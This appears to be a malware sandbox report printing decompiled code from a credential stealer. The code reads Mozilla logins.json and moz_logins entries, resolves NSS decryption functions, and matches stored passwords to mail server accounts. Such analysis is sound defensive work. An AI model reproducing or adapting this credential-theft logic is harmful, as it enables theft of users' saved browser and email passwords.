                                                                                                                                                                  				char _v92;
                                                                                                                                                                  				char _v108;
                                                                                                                                                                  				char _v132;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				void _v419;
                                                                                                                                                                  				int _v420;
                                                                                                                                                                  				void _v675;
                                                                                                                                                                  				int _v676;
                                                                                                                                                                  				void _v1291;
                                                                                                                                                                  				char _v1292;
                                                                                                                                                                  				void _v1907;
                                                                                                                                                                  				char _v1908;
                                                                                                                                                                  				void _v2523;
                                                                                                                                                                  				char _v2524;
                                                                                                                                                                  				char _v3548;
                                                                                                                                                                  				char _v4572;
                                                                                                                                                                  				char _v5596;
                                                                                                                                                                  				char _v6620;
                                                                                                                                                                  				char _v7644;
                                                                                                                                                                  				void _v8667;
                                                                                                                                                                  				char _v8668;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				signed int _t92;
                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                  				intOrPtr* _t101;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				char* _t122;
                                                                                                                                                                  				signed int _t148;
                                                                                                                                                                  				char* _t149;
                                                                                                                                                                  				signed int _t150;
                                                                                                                                                                  				signed int _t157;
                                                                                                                                                                  				signed int _t159;
                                                                                                                                                                  				int _t175;
                                                                                                                                                                  				void* _t207;
                                                                                                                                                                  				void* _t208;
                                                                                                                                                                  				intOrPtr _t209;
                                                                                                                                                                  				char* _t213;
                                                                                                                                                                  				intOrPtr _t215;
                                                                                                                                                                  				signed int _t216;
                                                                                                                                                                  				void* _t218;
                                                                                                                                                                  				intOrPtr _t221;
                                                                                                                                                                  				char* _t225;
                                                                                                                                                                  				void* _t229;
                                                                                                                                                                  				void* _t230;
                                                                                                                                                                  				void* _t231;
                                                                                                                                                                  
                                                                                                                                                                  				_t207 = __edx;
                                                                                                                                                                  				E00412360(0x21dc, __ecx);
				_t209 = _a4;
				_t221 = _t209 + 0x30;
				_v20 = _t221;
				_t91 = E0040E54C(_t221, _t209 + 0x362);
				if(_t91 == 0) {
					return _t91;
				}
				_t92 =  *(_t221 + 4);
				_t175 = 0;
				if(_t92 == 0) {
					_t93 = _t92 | 0xffffffff;
					__eflags = _t93;
				} else {
					_t93 =  *_t92(_t209);
				}
				_t235 = _t93 - _t175;
				if(_t93 != _t175) {
					L36:
					return E0040E6B4(_t221);
				} else {
					E00411C05(_t209, _t221, _t235, E00411BDA(_t235), _a8);
					E00411EB7(_t207,  &_v164, _t235);
					// Looks up the "logins" array of a Mozilla-style logins store (field names below match logins.json)
					_t208 = E00411CB0( &_v164, "logins");
					_t236 = _t208 - _t175;
					if(_t208 == _t175) {
						L33:
						_t101 =  *((intOrPtr*)(_v20 + 8));
						if(_t101 != _t175) {
							 *_t101();
						}
						E00404638( &_v108);
						E00406B8A( &_v132);
						E00406A7D( &_v164);
						_t221 = _v20;
						goto L36;
					}
					E00411BDA(_t236);
					_t109 = E00406B3E( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 + 8)));
					_t237 = _t109 - _t175;
					if(_t109 == _t175) {
						_t109 = 0x41344f;
					}
					_v40 = _t175;
					E00406CFF( &_v60, _t109);
					// Iterates over each login entry and copies its fields into fixed-size stack buffers
					while(E00411EB7(_t208,  &_v92, _t237) != 0) {
						_v8668 = _t175;
						memset( &_v8667, _t175, 0x3ff);
						memset( &_v7644, _t175, 0x1400);
						_t231 = _t230 + 0x18;
						_t212 =  &_v92;
						_t225 = E00411C8A( &_v92, "hostname");
						_v16 = E00411C8A( &_v92, "encryptedUsername");
						_a8 = E00411C8A( &_v92, "encryptedPassword");
						_v12 = E00411C8A( &_v92, "usernameField");
						_v8 = E00411C8A(_t212, "passwordField");
						_t122 = E00411C8A(_t212, "httpRealm");
						__eflags = _t225 - _t175;
						_t213 = _t122;
						if(_t225 != _t175) {
							strcpy( &_v8668, _t225);
						}
						__eflags = _v16 - _t175;
						if(_v16 != _t175) {
							strcpy( &_v7644, _v16);
						}
						__eflags = _a8 - _t175;
						if(_a8 != _t175) {
							strcpy( &_v6620, _a8);
						}
						__eflags = _v12 - _t175;
						if(_v12 != _t175) {
							strcpy( &_v5596, _v12);
						}
						__eflags = _v8 - _t175;
						if(_v8 != _t175) {
							strcpy( &_v4572, _v8);
						}
						__eflags = _t213 - _t175;
						if(_t213 != _t175) {
							strcpy( &_v3548, _t213);
						}
						_v676 = _t175;
						memset( &_v675, _t175, 0xff);
						_v420 = _t175;
						memset( &_v419, _t175, 0xff);
						_t215 = _a4;
						_t230 = _t231 + 0x18;
						// E0040CF02 is applied to the encryptedPassword and encryptedUsername values; its output
						// lands in the 0xff-byte buffers _v420 / _v676 that are copied into the result records below
						E0040CF02(_a8, _t215,  &_v420);
						E0040CF02(_v16, _t215,  &_v676);
						__eflags =  *((intOrPtr*)(_t215 + 0x474)) - _t175;
						_a8 = _t175;
						if(__eflags > 0) {
							_t216 = _t215 + 0x468;
							__eflags = _t216;
							_v8 = _t216;
							// Matches each login against the previously collected account server names
							// by rebuilding the mailbox://, imap:// and smtp:// forms of the hostname
							do {
								_t229 = E0040DA96(_a8, _v8);
								_v1292 = _t175;
								memset( &_v1291, _t175, 0x261);
								_v2524 = _t175;
								memset( &_v2523, _t175, 0x261);
								_v1908 = _t175;
								memset( &_v1907, _t175, 0x261);
								_t56 = _t229 + 0x104; // 0x104
								_t218 = _t56;
								sprintf( &_v1292, "mailbox://%s", _t218);
								sprintf( &_v2524, "imap://%s", _t218);
								sprintf( &_v1908, "smtp://%s", _t218);
								_t230 = _t230 + 0x48;
								// L00412072 takes two strings and a zero result is treated as a match (string-compare style)
								_push( &_v3548);
								_t148 =  &_v1292;
								_push(_t148);
								L00412072();
								__eflags = _t148;
								if(_t148 == 0) {
									L26:
									_t66 = _t229 + 0x204; // 0x204
									_t149 = _t66;
									_push(_t149);
									_v12 = _t149;
									_t150 =  &_v676;
									_push(_t150);
									L00412072();
									__eflags = _t150;
									if(_t150 == 0) {
										__eflags = _v420 - _t175;
										if(_v420 != _t175) {
											_t71 = _t229 + 0x304; // 0x304
											E004060DA(0xff, _t71,  &_v420);
										}
										E004060DA(0xff, _v12,  &_v676);
										_t175 = 0;
										__eflags = 0;
									}
									goto L30;
								}
								_push( &_v3548);
								_t157 =  &_v2524;
								_push(_t157);
								L00412072();
								__eflags = _t157;
								if(_t157 == 0) {
									goto L26;
								}
								_push( &_v3548);
								_t159 =  &_v1908;
								_push(_t159);
								L00412072();
								__eflags = _t159;
								if(_t159 != 0) {
									goto L30;
								}
								goto L26;
								L30:
								_a8 =  &(_a8[1]);
								__eflags = _a8 -  *((intOrPtr*)(_a4 + 0x474));
							} while (__eflags < 0);
						}
					}
					E00404638( &_v36);
					E00406B8A( &_v60);
					E00406A7D( &_v92);
					goto L33;
				}
			}
                                                                                                                                                                  0x0040d387
                                                                                                                                                                  0x0040d389
                                                                                                                                                                  0x0040d389
                                                                                                                                                                  0x0040d38e
                                                                                                                                                                  0x0040d396
                                                                                                                                                                  0x0040d3a1
                                                                                                                                                                  0x0040d3a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d3a6
                                                                                                                                                                  0x0040d086
                                                                                                                                                                  0x0040d091
                                                                                                                                                                  0x0040d096
                                                                                                                                                                  0x0040d098
                                                                                                                                                                  0x0040d09a
                                                                                                                                                                  0x0040d09a
                                                                                                                                                                  0x0040d0a4
                                                                                                                                                                  0x0040d0a7
                                                                                                                                                                  0x0040d358
                                                                                                                                                                  0x0040d0be
                                                                                                                                                                  0x0040d0c4
                                                                                                                                                                  0x0040d0d6
                                                                                                                                                                  0x0040d0db
                                                                                                                                                                  0x0040d0e3
                                                                                                                                                                  0x0040d0f0
                                                                                                                                                                  0x0040d0fc
                                                                                                                                                                  0x0040d109
                                                                                                                                                                  0x0040d116
                                                                                                                                                                  0x0040d123
                                                                                                                                                                  0x0040d126
                                                                                                                                                                  0x0040d12b
                                                                                                                                                                  0x0040d12d
                                                                                                                                                                  0x0040d12f
                                                                                                                                                                  0x0040d139
                                                                                                                                                                  0x0040d13f
                                                                                                                                                                  0x0040d140
                                                                                                                                                                  0x0040d143
                                                                                                                                                                  0x0040d14f
                                                                                                                                                                  0x0040d155
                                                                                                                                                                  0x0040d156
                                                                                                                                                                  0x0040d159
                                                                                                                                                                  0x0040d165
                                                                                                                                                                  0x0040d16b
                                                                                                                                                                  0x0040d16c
                                                                                                                                                                  0x0040d16f
                                                                                                                                                                  0x0040d17b
                                                                                                                                                                  0x0040d181
                                                                                                                                                                  0x0040d182
                                                                                                                                                                  0x0040d185
                                                                                                                                                                  0x0040d191
                                                                                                                                                                  0x0040d197
                                                                                                                                                                  0x0040d198
                                                                                                                                                                  0x0040d19a
                                                                                                                                                                  0x0040d1a4
                                                                                                                                                                  0x0040d1aa
                                                                                                                                                                  0x0040d1b9
                                                                                                                                                                  0x0040d1bf
                                                                                                                                                                  0x0040d1cd
                                                                                                                                                                  0x0040d1d3
                                                                                                                                                                  0x0040d1d8
                                                                                                                                                                  0x0040d1db
                                                                                                                                                                  0x0040d1ea
                                                                                                                                                                  0x0040d1fb
                                                                                                                                                                  0x0040d200
                                                                                                                                                                  0x0040d206
                                                                                                                                                                  0x0040d209
                                                                                                                                                                  0x0040d20f
                                                                                                                                                                  0x0040d20f
                                                                                                                                                                  0x0040d215
                                                                                                                                                                  0x0040d218
                                                                                                                                                                  0x0040d229
                                                                                                                                                                  0x0040d233
                                                                                                                                                                  0x0040d239
                                                                                                                                                                  0x0040d247
                                                                                                                                                                  0x0040d24d
                                                                                                                                                                  0x0040d25b
                                                                                                                                                                  0x0040d261
                                                                                                                                                                  0x0040d266
                                                                                                                                                                  0x0040d266
                                                                                                                                                                  0x0040d279
                                                                                                                                                                  0x0040d28b
                                                                                                                                                                  0x0040d29d
                                                                                                                                                                  0x0040d2a2
                                                                                                                                                                  0x0040d2ab
                                                                                                                                                                  0x0040d2ac
                                                                                                                                                                  0x0040d2b2
                                                                                                                                                                  0x0040d2b3
                                                                                                                                                                  0x0040d2b8
                                                                                                                                                                  0x0040d2bc
                                                                                                                                                                  0x0040d2f0
                                                                                                                                                                  0x0040d2f0
                                                                                                                                                                  0x0040d2f0
                                                                                                                                                                  0x0040d2f6
                                                                                                                                                                  0x0040d2f7
                                                                                                                                                                  0x0040d2fa
                                                                                                                                                                  0x0040d300
                                                                                                                                                                  0x0040d301
                                                                                                                                                                  0x0040d306
                                                                                                                                                                  0x0040d30a
                                                                                                                                                                  0x0040d30c
                                                                                                                                                                  0x0040d312
                                                                                                                                                                  0x0040d31b
                                                                                                                                                                  0x0040d326
                                                                                                                                                                  0x0040d32b
                                                                                                                                                                  0x0040d33b
                                                                                                                                                                  0x0040d341
                                                                                                                                                                  0x0040d341
                                                                                                                                                                  0x0040d341
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d30a
                                                                                                                                                                  0x0040d2c4
                                                                                                                                                                  0x0040d2c5
                                                                                                                                                                  0x0040d2cb
                                                                                                                                                                  0x0040d2cc
                                                                                                                                                                  0x0040d2d1
                                                                                                                                                                  0x0040d2d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d2dd
                                                                                                                                                                  0x0040d2de
                                                                                                                                                                  0x0040d2e4
                                                                                                                                                                  0x0040d2e5
                                                                                                                                                                  0x0040d2ea
                                                                                                                                                                  0x0040d2ee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d343
                                                                                                                                                                  0x0040d343
                                                                                                                                                                  0x0040d34c
                                                                                                                                                                  0x0040d34c
                                                                                                                                                                  0x0040d218
                                                                                                                                                                  0x0040d209
                                                                                                                                                                  0x0040d36b
                                                                                                                                                                  0x0040d373
                                                                                                                                                                  0x0040d37a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d37a

APIs
  • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
  • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
  • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
  • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
  • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
  • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
  • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
  • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
  • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
  • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
• memset.MSVCRT ref: 0040D0C4
• memset.MSVCRT ref: 0040D0D6
• strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D139
• strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D14F
• strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D165
• strcpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D17B
• strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D191
• strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D1A4
• memset.MSVCRT ref: 0040D1BF
• memset.MSVCRT ref: 0040D1D3
• memset.MSVCRT ref: 0040D239
• memset.MSVCRT ref: 0040D24D
• memset.MSVCRT ref: 0040D261
• sprintf.MSVCRT ref: 0040D279
• sprintf.MSVCRT ref: 0040D28B
• sprintf.MSVCRT ref: 0040D29D
• _stricmp.MSVCRT(?,?), ref: 0040D2B3
• _stricmp.MSVCRT(?,?), ref: 0040D2CC
• _stricmp.MSVCRT(?,?), ref: 0040D2E5
                                                                                                                                                                  • _stricmp.MSVCRT(?,00000204), ref: 0040D301
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$CurrentDirectoryLibraryLoadstrlen$HandleModule
                                                                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                  • API String ID: 1176642800-3943159138
                                                                                                                                                                  • Opcode ID: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                                                                                                                                                                  • Instruction ID: cce80d09e33f880f425c5e7640b59ca7d1e8d6c5df6cdb4a6b0c5a683426509d
                                                                                                                                                                  • Opcode Fuzzy Hash: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                                                                                                                                                                  • Instruction Fuzzy Hash: CDA15372D00119AEDB20EBA5CD819DE77BCAF44308F1405ABF608F7141DA3CAA85CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0040D3B5(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                                                                                                                                  				char* _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				char* _v16;
                                                                                                                                                                  				char* _v20;
                                                                                                                                                                  				char* _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				int _v32;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				char _v68;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				void _v331;
                                                                                                                                                                  				int _v332;
                                                                                                                                                                  				void _v587;
                                                                                                                                                                  				int _v588;
                                                                                                                                                                  				void _v851;
                                                                                                                                                                  				char _v852;
                                                                                                                                                                  				void _v1378;
                                                                                                                                                                  				short _v1380;
                                                                                                                                                                  				void _v1995;
                                                                                                                                                                  				char _v1996;
                                                                                                                                                                  				void _v2611;
                                                                                                                                                                  				char _v2612;
                                                                                                                                                                  				void _v3227;
                                                                                                                                                                  				char _v3228;
                                                                                                                                                                  				char _v4252;
                                                                                                                                                                  				char _v5276;
                                                                                                                                                                  				char _v6300;
                                                                                                                                                                  				char _v7324;
                                                                                                                                                                  				char _v8348;
                                                                                                                                                                  				void _v9371;
                                                                                                                                                                  				char _v9372;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				intOrPtr _t115;
                                                                                                                                                                  				void* _t116;
                                                                                                                                                                  				signed int _t117;
                                                                                                                                                                  				signed int _t118;
                                                                                                                                                                  				intOrPtr* _t122;
                                                                                                                                                                  				void* _t133;
                                                                                                                                                                  				char* _t179;
                                                                                                                                                                  				int* _t180;
                                                                                                                                                                  				char* _t187;
                                                                                                                                                                  				char* _t189;
                                                                                                                                                                  				int _t208;
                                                                                                                                                                  				char* _t246;
                                                                                                                                                                  				void* _t247;
                                                                                                                                                                  				intOrPtr _t250;
                                                                                                                                                                  				char* _t254;
                                                                                                                                                                  				intOrPtr _t256;
                                                                                                                                                                  				void* _t258;
                                                                                                                                                                  				void* _t260;
                                                                                                                                                                  				void* _t261;
                                                                                                                                                                  				void* _t262;
                                                                                                                                                                  
                                                                                                                                                                  				E00412360(0x249c, __ecx);
                                                                                                                                                                  				_t115 = _a4;
                                                                                                                                                                  				_t245 = _t115 + 0x362;
                                                                                                                                                                  				_t250 = _t115 + 0x30;
                                                                                                                                                                  				_v28 = _t250;
                                                                                                                                                                  				_t116 = E0040E54C(_t250, _t115 + 0x362);
                                                                                                                                                                  				if(_t116 == 0) {
                                                                                                                                                                  					return _t116;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t117 =  *(_t250 + 4);
                                                                                                                                                                  				_t208 = 0;
                                                                                                                                                                  				if(_t117 == 0) {
                                                                                                                                                                  					_t118 = _t117 | 0xffffffff;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t118 =  *_t117(_a4 + 0x158);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t118 != _t208) {
                                                                                                                                                                  					L43:
                                                                                                                                                                  					return E0040E6B4(_v28);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v32 = _t208;
                                                                                                                                                                  					if(E0040FCBC( &_v68, _t245) == 0) {
                                                                                                                                                                  						L41:
                                                                                                                                                                  						_t122 =  *((intOrPtr*)(_v28 + 8));
                                                                                                                                                                  						if(_t122 != _t208) {
                                                                                                                                                                  							 *_t122();
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L43;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_v12 = _t208;
                                                                                                                                                                  						_v1380 = _t208;
                                                                                                                                                                  						memset( &_v1378, _t208, 0x208);
                                                                                                                                                                  						_v852 = _t208;
                                                                                                                                                                  						memset( &_v851, _t208, 0x104);
                                                                                                                                                                  						_t261 = _t260 + 0x18;
                                                                                                                                                                  						MultiByteToWideChar(_t208, _t208, _a8, 0xffffffff,  &_v1380, 0x104);
                                                                                                                                                                  						WideCharToMultiByte(0xfde9, _t208,  &_v1380, 0xffffffff,  &_v852, 0x104, _t208, _t208);
                                                                                                                                                                  						if(_v68 != _t208) {
                                                                                                                                                                  							_v68( &_v852,  &_v12);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v12 != _t208) {
                                                                                                                                                                  							_a8 = _t208;
                                                                                                                                                                  							if(_v64 != _t208) {
                                                                                                                                                                  								_v64(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v72);
                                                                                                                                                                  								_t261 = _t261 + 0x14;
                                                                                                                                                                  							}
							L11:
                                                                                                                                                                  							if(_v60 == _t208) {
                                                                                                                                                                  								_t133 = 0xffff;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t133 = _v60(_a8);
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_t133 != 0x64) {
                                                                                                                                                                  								goto L36;
                                                                                                                                                                  							}
                                                                                                                                                                  							_v9372 = _t208;
                                                                                                                                                                  							memset( &_v9371, _t208, 0x3ff);
                                                                                                                                                                  							memset( &_v8348, _t208, 0x1400);
                                                                                                                                                                  							_t262 = _t261 + 0x18;
                                                                                                                                                                  							_t254 = E0040FE97( &_v68, _a8, 1);
                                                                                                                                                                  							_t246 = E0040FE97( &_v68, _a8, 6);
                                                                                                                                                                  							_v8 = E0040FE97( &_v68, _a8, 7);
                                                                                                                                                                  							_v20 = E0040FE97( &_v68, _a8, 4);
                                                                                                                                                                  							_v24 = E0040FE97( &_v68, _a8, 5);
                                                                                                                                                                  							_v16 = E0040FE97( &_v68, _a8, 2);
                                                                                                                                                                  							if(_t254 != _t208) {
                                                                                                                                                                  								strcpy( &_v9372, _t254);
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_t246 != _t208) {
                                                                                                                                                                  								strcpy( &_v8348, _t246);
							}
							if(_v8 != _t208) {
								strcpy( &_v7324, _v8);
							}
							if(_v20 != _t208) {
								strcpy( &_v6300, _v20);
							}
							if(_v24 != _t208) {
								strcpy( &_v5276, _v24);
							}
							if(_v16 != _t208) {
								strcpy( &_v4252, _v16);
							}
							_v332 = _t208;
							memset( &_v331, _t208, 0xff);
							_v588 = _t208;
							memset( &_v587, _t208, 0xff);
							_t256 = _a4;
							_t261 = _t262 + 0x18;
							E0040CF02(_v8, _t256,  &_v588);
							E0040CF02(_t246, _t256,  &_v332);
							_v8 = _t208;
							if( *((intOrPtr*)(_t256 + 0x474)) > _t208) {
								_v16 = _t256 + 0x468;
								do {
									_t247 = E0040DA96(_v8, _v16);
									_v3228 = _t208;
									memset( &_v3227, _t208, 0x261);
									_v1996 = _t208;
									memset( &_v1995, _t208, 0x261);
									_v2612 = _t208;
									memset( &_v2611, _t208, 0x261);
									_t84 = _t247 + 0x104; // 0x104
									_t258 = _t84;
									sprintf( &_v3228, "mailbox://%s", _t258);
									sprintf( &_v1996, "imap://%s", _t258);
									sprintf( &_v2612, "smtp://%s", _t258);
									_t261 = _t261 + 0x48;
									_push( &_v4252);
									_t179 =  &_v3228;
									_push(_t179);
									L00412072();
									if(_t179 == 0) {
										L32:
										_t94 = _t247 + 0x204; // 0x204
										_t259 = _t94;
										_t180 =  &_v332;
										_push(_t94);
										_push(_t180);
										L00412072();
										if(_t180 == 0) {
											E004060DA(0xff, _t247 + 0x304,  &_v588);
											E004060DA(0xff, _t259,  &_v332);
											_t208 = 0;
										}
										goto L34;
									}
									_push( &_v4252);
									_t187 =  &_v1996;
									_push(_t187);
									L00412072();
									if(_t187 == 0) {
										goto L32;
									}
									_push( &_v4252);
									_t189 =  &_v2612;
									_push(_t189);
									L00412072();
									if(_t189 != 0) {
										goto L34;
									}
									goto L32;
									L34:
									_v8 =  &(_v8[1]);
								} while (_v8 <  *((intOrPtr*)(_a4 + 0x474)));
							}
							goto L11;
							L36:
							if(_a8 != _t208 && _v44 != _t208) {
								_v44(_a8);
							}
							if(_v40 != _t208) {
								_v40(_v12);
							}
						}
						goto L41;
					}
				}
			}
Address column for the decompiled listing:

0x0040d3bd 0x0040d3c2 0x0040d3c8 0x0040d3ce 0x0040d3d2 0x0040d3d5 0x0040d3dc 0x0040d7be
0x0040d7be 0x0040d3e2 0x0040d3e5 0x0040d3e9 0x0040d3fa 0x0040d3eb 0x0040d3f5 0x0040d3f7
0x0040d3ff 0x0040d7b2 0x00000000 0x0040d405 0x0040d409 0x0040d413 0x0040d7a6 0x0040d7a9
0x0040d7ae 0x0040d7b0 0x0040d7b0 0x00000000 0x0040d419 0x0040d426 0x0040d429 0x0040d430
0x0040d443 0x0040d449 0x0040d44e 0x0040d460 0x0040d47f 0x0040d488 0x0040d495 0x0040d499
0x0040d49d 0x0040d4a6 0x0040d4a9 0x0040d4bd 0x0040d4c0 0x0040d4c0 0x00000000 0x0040d4c3
0x0040d4c6 0x0040d4d1 0x0040d4c8 0x0040d4cb 0x0040d4ce 0x0040d4d9 0x00000000 0x00000000
0x0040d4ec 0x0040d4f2 0x0040d504 0x0040d509 0x0040d51e 0x0040d52d 0x0040d53c 0x0040d54c
0x0040d55c 0x0040d569 0x0040d56c 0x0040d576 0x0040d57c 0x0040d57f 0x0040d589 0x0040d58f
0x0040d593 0x0040d59f 0x0040d5a5 0x0040d5a9 0x0040d5b5 0x0040d5bb 0x0040d5bf 0x0040d5cb
0x0040d5d1 0x0040d5d5 0x0040d5e1 0x0040d5e7 0x0040d5f6 0x0040d5fc 0x0040d60a 0x0040d610
0x0040d615 0x0040d618 0x0040d627 0x0040d637 0x0040d642 0x0040d645 0x0040d652 0x0040d655
0x0040d666 0x0040d670 0x0040d676 0x0040d684 0x0040d68a 0x0040d698 0x0040d69e 0x0040d6a3
0x0040d6a3 0x0040d6b6 0x0040d6c8 0x0040d6da 0x0040d6df 0x0040d6e8 0x0040d6e9 0x0040d6ef
0x0040d6f0
                                                                                                                                                                  0x0040d6f9
                                                                                                                                                                  0x0040d72d
                                                                                                                                                                  0x0040d72d
                                                                                                                                                                  0x0040d72d
                                                                                                                                                                  0x0040d733
                                                                                                                                                                  0x0040d739
                                                                                                                                                                  0x0040d73a
                                                                                                                                                                  0x0040d73b
                                                                                                                                                                  0x0040d744
                                                                                                                                                                  0x0040d758
                                                                                                                                                                  0x0040d766
                                                                                                                                                                  0x0040d76d
                                                                                                                                                                  0x0040d76d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d744
                                                                                                                                                                  0x0040d701
                                                                                                                                                                  0x0040d702
                                                                                                                                                                  0x0040d708
                                                                                                                                                                  0x0040d709
                                                                                                                                                                  0x0040d712
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d71a
                                                                                                                                                                  0x0040d71b
                                                                                                                                                                  0x0040d721
                                                                                                                                                                  0x0040d722
                                                                                                                                                                  0x0040d72b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d76f
                                                                                                                                                                  0x0040d76f
                                                                                                                                                                  0x0040d778
                                                                                                                                                                  0x0040d784
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d789
                                                                                                                                                                  0x0040d78c
                                                                                                                                                                  0x0040d796
                                                                                                                                                                  0x0040d799
                                                                                                                                                                  0x0040d79d
                                                                                                                                                                  0x0040d7a2
                                                                                                                                                                  0x0040d7a5
                                                                                                                                                                  0x0040d79d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d49d
                                                                                                                                                                  0x0040d413

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                                                                                                                                                                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
